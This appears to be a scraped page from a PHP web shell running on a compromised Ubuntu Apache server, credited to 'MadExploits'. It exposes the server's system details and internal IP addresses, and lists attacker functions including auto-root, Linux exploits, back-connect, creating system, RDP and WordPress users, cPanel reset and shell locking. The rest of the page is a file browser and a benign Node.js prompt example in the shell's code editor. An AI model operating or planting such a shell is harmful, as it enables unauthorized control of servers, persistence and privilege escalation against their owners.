Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
prompt /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
add-properties.js
597
B
-rw-rw-r--
existing-properties.js
640
B
-rw-rw-r--
history.js
866
B
-rw-rw-r--
nested-properties-prompt.js
703
B
-rw-rw-r--
old-schema.js
652
B
-rw-rw-r--
override-validation.js
1.11
KB
-rw-rw-r--
password.js
609
B
-rw-rw-r--
prompt-override.js
730
B
-rw-rw-r--
property-prompt.js
865
B
-rw-rw-r--
simple-prompt.js
473
B
-rw-rw-r--
yes-or-no-prompt.js
544
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nested-properties-prompt.js
/* * property-prompt.js: Example of using prompt with complex properties. * * (C) 2010, Nodejitsu Inc. * */ var prompt = require('../lib/prompt'); var schema = { properties: { url: { required: true, format: 'url' }, auth: { properties: { username: { required: true }, password: { required: true, hidden: true } } } } }; prompt.start(); prompt.get(schema, function (err, result) { console.log('Command-line input received:'); console.log(' url: ' + result.url); console.log(' auth:username: ' + result.auth.username); console.log(' auth:password: ' + result.auth.password); });
Close